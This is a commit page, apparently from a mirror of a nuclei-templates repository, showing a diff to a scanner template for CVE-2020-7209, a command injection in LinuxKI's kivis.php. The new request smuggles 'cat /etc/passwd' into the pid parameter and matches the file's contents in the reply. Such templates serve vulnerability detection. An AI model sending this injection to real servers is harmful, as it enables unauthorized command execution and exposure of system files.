daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2020-7209.yaml

patch-1
PikPikcU 2020-09-01 13:08:31 +00:00 committed by GitHub
parent 3f977fcf62
commit d7a44ae025
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
cves/CVE-2020-7209.yaml
View File

@ -9,19 +9,17 @@ info:
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
# https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
# venedor: https://www.hpe.com/us/en/home.html
# softwar: https://github.com/HewlettPackard/LinuxKI
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d" - "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"
headers:
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: regex
words: regex:
- "nonexistent" - "root:[x*]:0:0:"
part: body part: body
- type: status
status:
- 200